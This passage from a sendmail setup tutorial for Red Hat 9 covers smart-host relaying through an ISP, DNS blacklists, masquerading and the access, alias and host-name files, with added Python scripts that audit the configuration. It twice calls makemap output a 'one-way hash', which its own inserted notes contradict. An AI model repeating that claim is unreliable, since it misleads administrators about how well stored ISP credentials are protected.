This will forward mail to your other machine which will interface to the outside world and local users. You will need to have your access file set up correctly on your gateway machine to allow relaying from this internal sendmail machine.

7. Replace the following line and modify it as required.

MASQUERADE_AS(`mydomain.com')dnl Becomes

MASQUERADE_AS(`eexamplee.net')dnl

This causes all sent mail to appear to come from eexamplee.net.

8. Replace the following line and modify it as required.

MASQUERADE_AS(mydomain.com)dnl Becomes

MASQUERADE_AS(eexamplee.net)dnl

Note this is identical to the previous line except without the single quotes. Don’t know about this one.

9. Uncomment the following:

FEATURE(masquerade_envelope)dnl

This is similar to the previous masquerade statement except it also masquerades the entire envelope.

10. Replace and modify the following:

LOCAL_DOMAIN(`mydomain.com')dnl Becomes

LOCAL_DOMAIN(`eexamplee.net')dnl

This defines the domain name to masquerade.

11. Comment out the following line:

MAILER(smtp)dnl

12. Comment out the following line:

MAILER(procmail)dnl

Other changes beyond sendmail.mc

The next step is to modify the ancillary files to let sendmail do its thing.

Setting up the access file

The /etc/mail/access file allows you to block access to the mail server based on host names and IP addresses. You can use this to create blacklists and whitelists although they can be a bit hard to maintain as they are static. There are some lines you need to have in here even if you don’t explicitly list anything else. The required lines are the localhost and the hostname.

hostname.eexamplee.net    RELAY
localhost                 RELAY
127.0.0.1                 RELAY
192.168.5                 RELAY
192.168.100               RELAY

Setting up the local-host-names file

The /etc/mail/local-host-names file defines the aliases for the local machine. You want to put all the names in here that will be used by sendmail to define the host.

# local-host-names – include all aliases for your machine here.
eexamplee.net
mail.eexamplee.net

Pretty self explanatory.

Modifying the aliases file

The /etc/aliases file contains the mail aliases for the server. It is important that some of these be here to be compliant with RFCs. Usually you will only need to edit the last line.

# Person who should get root’s mail
root:           billybob

You may want to add some other lines for something like spamtrap: or any other aliases.

 

Burn it!

Now we will make sure everything is prepped and ready to use by sendmail. Execute the following commands as root:

/usr/bin/newaliases    This activates the changes you made to the /etc/aliases file. Note: if you change aliases in the future, you only need to execute this command, you do not need to restart sendmail for the changes to show through.

makemap hash /etc/mail/access < /etc/mail/access    This creates a hashed version of your access database. This will keep your ISP username and password secure. (Strictly, "hash" here is the Berkeley DB hash-table file format, not a one-way hash: any credentials stay readable inside it, so keep access.db readable by root only, as with access itself.) A new /etc/mail/access.db file will be created.

makemap hash /etc/mail/local-host-names < /etc/mail/local-host-names    Like above, this creates a one-way hash of the local-host-names file you modified.

make -C /etc/mail    (That's an upper case "C") This creates the /etc/mail/sendmail.cf file from the /etc/mail/sendmail.mc file you modified earlier. Note: some of the above steps are covered here by the makefile but it won't hurt to make them again.

Now all you have to do is restart the server.

/sbin/service sendmail restart    This will kill the sendmail job (if its running) and restart it using all your configuration changes.

That’s it!

Sendmail Mods — Using Sendmail Correctly From Your Dynamic ISP Address

Modifying the sendmail.mc file to make it work….

Listed below are the changes to a default RH 9 /etc/mail/sendmail.mc file required to operate a mail server behind a non-reversible IP address. This should work for DSL, cable modem and [shudder] dial-up. If you can’t do a reverse DNS lookup on your domain and have it resolve to your IP (dynamic or otherwise) you may have trouble delivering mail to many destinations. These changes are also good for general sendmail set-up except you may want to omit step 3.

You are NOT done once you change the .mc file. There are other changes that need to be done to the server.


Anything not listed for change/add/delete here should work fine with the default settings. I do NOT know if this will work for any other installation (e.g. Red Hat 7.2 or Mandrake). This worked with the default sendmail RPM shipped with RH 9 (and subsequent sendmail updates). I gleaned some parts of this from several sources but one of your best resources is the published Red Hat documentation. RTFM. Red Hat has excellent manuals and you will find most of this stuff there.

Some hearty souls may choose to edit the sendmail.cf file directly; however, I do not see the need for this. The whole idea of the sendmail.mc file is to make the configuration file manageable and to generate the .cf file. When I dove into this, I read as much as I could, including the vaunted O'Reilly Bat Book. Everything I read said to stick with the macros (m4 and mc) and let them generate the .cf. I've played with both files from time to time and find the .mc to be much more manageable for my pea-brain. The sendmail.mc file is 145 lines, the sendmail.cf file is 1800 lines. You figure it out….

You will need to run make -C /etc/mail as root to generate the sendmail.cf file from the sendmail.mc macro after you are finished making these changes. You will also need to do a /sbin/service sendmail restart as root once you have made the new sendmail.cf file. More on this below.

Please let me know if you see any errors or omissions in this document. Also, note that I am well aware I am not saving the world here.


 

Some definitions:

Comment out: Place a dnl or a dnl # in front of the line in the macro file. This will cause the m4 compiler to ignore that line.

Uncomment: Remove the dnl or dnl # in front of the line in the macro file. There may also be changes after you uncomment.

Add: New lines that should be added just like they are shown.

Replace: Replace the existing line (which will be shown) with the new line.

Notes: These are listed in roughly the order they appear in the sendmail.mc file, not by importance. I suggest you read through them all and sort out the ones you need. Don’t change the order of things too much as the compiler can get picky if too many things are defined out of order. Also, they insist on using forward-single-quotes (`) which are a pain if you don’t notice them. It is best to copy existing lines and modify them so you don’t mix up the forward and standard quotes.


Modify the actual sendmail.mc file

 

1. The most important change you need to make is this first step. You must comment out the following line:

DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl

This will allow sendmail to make connections with machines other than the localhost. Duh. The reason for having this line included (turned on) by default will be left as an exercise for the reader.

2. Comment out the following line:

FEATURE(`accept_unresolvable_domains')dnl

If this line is NOT commented out, you will open yourself up to more spam as sendmail will not do one of its basic checks on the incoming MTA.

3. Another key change is to set up your ISP as your “smart host”. This is done by the following replace:

dnl define(`SMART_HOST',`smtp.your.provider')   Becomes

define(`SMART_HOST',`outgoing.earthlink.net')   (or whatever your ISP's SMTP gateway is)

You are essentially using your ISP as a mail relay. This is the same technique that spammers use (in an attempt) to hide their identity. Here, we do it so that the mail will be sourced from an established IP that will pass a reverse DNS test. The server at outgoing.earthlink.net will very likely require a login to relay like this. We will take care of that later. Your ISP sees this as an SMTP (port 25) connection just like you sent it from an MUA like Outlook. Most large organizations like AOL, Hotmail and Juno will not accept mail from your DSL or cable-modem address. You do not have to do this to make your server work, but expect a large number of bounces if you don’t.

4. Add the following line:

define(`confBIND_OPTS', `WorkAroundBrokenAAAA')dnl

This change is a work-around for broken name servers. It's not a big deal, although some of the blacklists (see below) recommend you have this enabled.

5. Replace the following line to fine tune the response to MTA queries and increase your privacy:

define(`confPRIVACY_FLAGS', `authwarnings,novrfy,noexpn,restrictqrun')dnl   Becomes

define(`confPRIVACY_FLAGS', `goaway,restrictqrun')dnl

This increases security by limiting the amount of information your sendmail server spews out to door-knockers. This is also an anti-spam measure. Note that “goaway” is a short-hand version of many of the flags in the original configuration line.

6. This one is just for fun and probably violates some RFCs so I would not recommend doing it. Add the following:

define(`confSMTP_LOGIN_MSG',`$j Microsoft SMTPSVC 4.0.1095.2600')

This makes the mail server advertise itself as the defined string during SMTP connections. I did this in an attempt to fool people into believing that I was running a Microsoft server. Security through obscurity. It doesn’t work. Any scanning tool such as Nessus can see right through this ruse.

7. Uncomment the following line:

FEATURE(`delay_checks’)dnl

Another non-essential change, however it provides some extra information when spammers attempt to connect or relay through your machine.

8. Now we add some heavyweight spam fighters. The blacklists. Add the following lines:

FEATURE(dnsbl,`zen.spamhaus.org',`"550 Mail from site rejected; see http://www.spamhaus.org"')dnl
FEATURE(enhdnsbl,`bl.spamcop.net',`"550 Server blocked see: http://spamcop.net/bl.shtml?"$&{client_addr}',`t')dnl
FEATURE(dnsbl, `dnsbl.njabl.org', `"550 Email rejected – see http://njabl.org"')dnl

These are only some of the blacklists available. A good list can be found here. Be careful about using some of those listed on that site as they are very aggressive and may cause false positives. The whole idea of blacklists has caused some vociferous arguments. If you are gun shy about possibly blocking some legitimate email, don’t use them or use something tame like McFadden Associates blacklist which will allow legit users to over-ride your blacklist. The “enhdnsbl” is an enhanced blacklist check that gives you other options on the FEATURE line. Check the homepage of the sites for instructions on how to use the dnsbl command with their particular blacklist.
NOTE: We no longer use or recommend the SORBS blacklist because of unreliable data and inaccessible web page.

9. Replace the following line and modify it as required.

MASQUERADE_AS(`mydomain.com')dnl Becomes

MASQUERADE_AS(`eexamplee.net')dnl

This causes all sent mail to appear to come from eexamplee.net.

10. Replace the following line and modify it as required.

MASQUERADE_AS(mydomain.com)dnl Becomes

MASQUERADE_AS(eexamplee.net.)dnl

Note this is nearly identical to the previous line except without the single quotes. Don’t know about this one although it comes directly from Red Hat documentation, I don’t believe it is required (???).

11. Uncomment the following:

FEATURE(masquerade_envelope)dnl

This is similar to the previous masquerade statement except it also masquerades the entire envelope.

12. Uncomment the following line:

FEATURE(masquerade_entire_domain)dnl

This causes all hosts to be masqueraded as eexamplee.net even host1.eexamplee.net and hostxyx.eexamplee.net. This will be important if you set up other machines behind your mail server and use it as a gateway.

13. Add the following line:

FEATURE(always_add_domain)dnl

This will add the domain name to all outbound mail.

14. Replace and modify the following:

MASQUERADE_DOMAIN(`mydomain.com')dnl Becomes

MASQUERADE_DOMAIN(`eexamplee.net')dnl

This defines the domain name to masquerade.
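The comment-out, uncomment, add and replace operations defined at the top of both sendmail posts, applied to their step lists (the 12 steps of the internal-handler post and the 14 steps of this one), as an added Python example that is not part of the original page: four small helpers edit a constructed sendmail.mc excerpt exactly the way the definitions describe (add inserts before the first MAILER line, because the notes warn that m4 gets picky about order), and an audit function flags the settings the steps tell you to turn off plus one that is never safe on a reachable MTA. The sample .mc text, the function names and the audit rules are assumptions of this example; only the macro lines quoted from the steps come from the page.

```python
import re

DNL_PREFIX = re.compile(r"^\s*dnl\s*#?\s*")


def comment_out(mc, needle):
    """'Comment out': put dnl in front of every active line containing needle."""
    out = []
    for line in mc.splitlines():
        if needle in line and not line.lstrip().startswith("dnl"):
            line = "dnl " + line
        out.append(line)
    return "\n".join(out) + "\n"


def uncomment(mc, needle):
    """'Uncomment': strip the leading dnl (or dnl #) from matching lines."""
    out = []
    for line in mc.splitlines():
        if needle in line and line.lstrip().startswith("dnl"):
            line = DNL_PREFIX.sub("", line)
        out.append(line)
    return "\n".join(out) + "\n"


def replace_line(mc, old, new):
    """'Replace': swap one exact line for another. Refuse if it is absent,
    because a silent no-op would leave the old setting in force."""
    lines = mc.splitlines()
    if old not in lines:
        raise ValueError("line not found: %s" % old)
    return "\n".join(new if line == old else line for line in lines) + "\n"


def add_line(mc, new, before="MAILER("):
    """'Add': insert before the first MAILER( line so FEATURE/define statements
    stay ahead of the mailer declarations."""
    lines = mc.splitlines()
    for i, line in enumerate(lines):
        if line.startswith(before):
            lines.insert(i, new)
            break
    else:
        lines.append(new)
    return "\n".join(lines) + "\n"


def active_lines(mc):
    """Lines m4 will actually process (non-empty and not dnl-commented)."""
    return [l for l in mc.splitlines() if l.strip() and not l.lstrip().startswith("dnl")]


def audit(mc):
    """Flag settings a mail admin does not want active on a reachable MTA."""
    issues = []
    active = active_lines(mc)
    if any("accept_unresolvable_domains" in l for l in active):
        issues.append("accept_unresolvable_domains active: sender-domain check disabled")
    if any("promiscuous_relay" in l for l in active):
        issues.append("promiscuous_relay active: this is an open relay")
    if any("Addr=127.0.0.1" in l for l in active):
        issues.append("DAEMON_OPTIONS bound to 127.0.0.1: other hosts cannot deliver to it")
    for l in active:
        if ("confPRIVACY_FLAGS" in l and "goaway" not in l
                and not ("novrfy" in l and "noexpn" in l)):
            issues.append("confPRIVACY_FLAGS leaves VRFY/EXPN enabled")
    return issues


def apply_dynamic_isp_steps(mc, smart_host, domain):
    """Steps 1, 2, 3, 5, 7, 9, 11 and 13 of the dynamic-ISP post, in order."""
    mc = comment_out(mc, "Addr=127.0.0.1")
    mc = comment_out(mc, "accept_unresolvable_domains")
    mc = replace_line(mc, "dnl define(`SMART_HOST',`smtp.your.provider')",
                      "define(`SMART_HOST',`%s')dnl" % smart_host)
    mc = replace_line(mc, "define(`confPRIVACY_FLAGS', `authwarnings,novrfy,noexpn,restrictqrun')dnl",
                      "define(`confPRIVACY_FLAGS', `goaway,restrictqrun')dnl")
    mc = uncomment(mc, "delay_checks")
    mc = replace_line(mc, "MASQUERADE_AS(`mydomain.com')dnl", "MASQUERADE_AS(`%s')dnl" % domain)
    mc = uncomment(mc, "masquerade_envelope")
    mc = add_line(mc, "FEATURE(always_add_domain)dnl")
    return mc


# Constructed excerpt in the style of the RH 9 default file; not the real one.
SAMPLE_MC = """\
divert(-1)dnl
include(`/usr/share/sendmail-cf/m4/cf.m4')dnl
VERSIONID(`constructed sample for illustration')dnl
OSTYPE(`linux')dnl
define(`confPRIVACY_FLAGS', `authwarnings,novrfy,noexpn,restrictqrun')dnl
dnl define(`SMART_HOST',`smtp.your.provider')
DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl
FEATURE(`accept_unresolvable_domains')dnl
dnl FEATURE(`delay_checks')dnl
MASQUERADE_AS(`mydomain.com')dnl
dnl FEATURE(masquerade_envelope)dnl
MAILER(smtp)dnl
MAILER(procmail)dnl
"""

if __name__ == "__main__":
    print("before:", audit(SAMPLE_MC))
    print("after: ", audit(apply_dynamic_isp_steps(SAMPLE_MC, "outgoing.earthlink.net", "eexamplee.net")))
```

Run the audit again after `make -C /etc/mail` regenerates sendmail.cf; it reads the .mc, so any line you re-enable by hand shows up immediately.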

 

Other changes beyond sendmail.mc

The next step is to modify the ancillary files to let sendmail do its thing.

Setting up the access file

The /etc/mail/access file allows you to block access to the mail server based on host names and IP addresses. You can use this to create blacklists and whitelists although they can be a bit hard to maintain as they are static. There are some lines you need to have in here even if you don’t explicitly list anything else.

mail.eexamplee.net    RELAY
localhost             RELAY
127.0.0.1             RELAY
192.168.5             RELAY
192.168.100           RELAY

These allow mail from the local host and from others on your network to use the server to get to the outside world. Of course you will need to modify these networks to your configuration. I have 192.168.5 and 192.168.100 addresses behind my firewall so they are in this list.

The next step is to add the login information to the /etc/mail/access file. This is required to let your ISP server know who you are when you request a relay of mail to the rest of the world. The example below uses plain text logins, which means your username and password are sent in plain text. Although this is not secure, it is also not uncommon. You will want to see if they will allow secure password authentication. You can then modify the lines below to use a different method other than LOGIN PLAIN. Also, you will want to make sure privileges on this file are set accordingly so that local users can not see these username/password combinations. This is not a problem as sendmail doesn't use this file directly, it uses the database hash which will be created later. Note, though, that the access.db built from it holds the same credentials in readable form, so it needs the same restrictive permissions as the access file.

AuthInfo:earthlink.net "U:username1" "P:secret" "M:LOGIN PLAIN"
AuthInfo:outgoing.earthlink.net "U:username1" "P:secret" "M:LOGIN PLAIN"

AuthInfo tells sendmail to use this information to answer authorization requests from the remote MTA. The next item is obviously the server name. U is the username to login and P is the password. M is the method of authentication used (see comments in above paragraph).
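A small checker for the two kinds of access-file entries this post uses (RELAY prefixes and AuthInfo lines), added here as a Python example that is not part of the original post. It parses the file, expands a dotted prefix such as 192.168.5 into the /24 that sendmail matches it against, flags any RELAY entry that covers non-private address space (the open-relay mistake), and flags an AuthInfo line whose M: field offers only LOGIN/PLAIN, since those send the password in clear text unless the session is TLS-protected. The sample file is constructed from the entries shown in the post plus one deliberately bad line in the 203.0.113.0/24 documentation range; the function names and the private-range list are my assumptions.

```python
import ipaddress
import re

# Address space where relaying for your own LAN is expected; RELAY for
# anything else, with no authentication, is effectively an open relay.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
PLAINTEXT_MECHS = {"LOGIN", "PLAIN"}   # transmit the password in the clear


def parse_access(text):
    """Yield (key, value) pairs from access-file text: key and value are
    separated by whitespace and '#' starts a comment line."""
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        parts = stripped.split(None, 1)
        if len(parts) == 2:
            yield parts[0], parts[1].strip()


def prefix_to_network(key):
    """sendmail matches a dotted prefix such as 192.168.5 against all of
    192.168.5.0/24; return that network, or None for a host name."""
    octets = key.split(".")
    if not 1 <= len(octets) <= 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        return None
    padded = octets + ["0"] * (4 - len(octets))
    return ipaddress.ip_network("%s/%d" % (".".join(padded), 8 * len(octets)))


def audit_access(text):
    """Return findings: RELAY for a non-private prefix, or an AuthInfo entry
    that offers only plaintext mechanisms."""
    findings = []
    for key, value in parse_access(text):
        if key.startswith("AuthInfo:"):
            match = re.search(r'"M:([^"]*)"', value)
            mechs = set(match.group(1).upper().split()) if match else set()
            if mechs and mechs <= PLAINTEXT_MECHS:
                findings.append("%s: only %s offered; password crosses the wire in "
                                "clear text unless TLS protects the session"
                                % (key, " ".join(sorted(mechs))))
            continue
        if value.upper() != "RELAY":
            continue
        net = prefix_to_network(key)
        if net is not None and not any(net.subnet_of(p) for p in PRIVATE_NETS):
            findings.append("%s RELAY: relays for public prefix %s" % (key, net))
    return findings


# Constructed sample based on the entries shown in the post; the 203.0.113
# line is a documentation-range address added to show a bad entry.
SAMPLE_ACCESS = """\
mail.eexamplee.net RELAY
localhost RELAY
127.0.0.1 RELAY
192.168.5 RELAY
192.168.100 RELAY
203.0.113 RELAY
AuthInfo:outgoing.earthlink.net "U:username1" "P:secret" "M:LOGIN PLAIN"
"""

if __name__ == "__main__":
    for finding in audit_access(SAMPLE_ACCESS):
        print(finding)
```

Host-name keys such as mail.eexamplee.net are left alone by the prefix check; the point of the audit is the network entries, where one careless octet turns a LAN relay rule into a public one.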

Setting up the local-host-names file

The /etc/mail/local-host-names file defines the aliases for the local machine. You want to put all the names in here that will be used by sendmail to define the host.

# local-host-names – include all aliases for your machine here.
eexamplee.net
mail.eexamplee.net

Pretty self explanatory.

Modifying the aliases file

The /etc/aliases file contains the mail aliases for the server. It is important that some of these be here to be compliant with RFCs. Usually you will only need to edit the last line.

# Person who should get root’s mail
root:           billybob

You may want to add some other lines for something like spamtrap: or any other aliases.

 

Burn it!

Now we will make sure everything is prepped and ready to use by sendmail. Execute the following commands as root:

/usr/bin/newaliases    This activates the changes you made to the /etc/aliases file. Note: if you change aliases in the future, you only need to execute this command, you do not need to restart sendmail for the changes to show through.

makemap hash /etc/mail/access < /etc/mail/access    This creates a hashed version of your access database. This will keep your ISP username and password secure. (Strictly, "hash" here is the Berkeley DB hash-table file format, not a one-way hash: the AuthInfo credentials stay readable inside it, so keep access.db readable by root only, as with access itself.) A new /etc/mail/access.db file will be created.

makemap hash /etc/mail/local-host-names < /etc/mail/local-host-names    Like above, this creates a one-way hash of the local-host-names file you modified.

make -C /etc/mail    (That's an upper case "C") This creates the /etc/mail/sendmail.cf file from the /etc/mail/sendmail.mc file you modified earlier. Note: some of the above steps are covered here by the makefile but it won't hurt to make them again.

Now all you have to do is restart the server.

/sbin/service sendmail restart    This will kill the sendmail job (if its running) and restart it using all your configuration changes.

That’s it! Now just sit back and watch the spam roll in.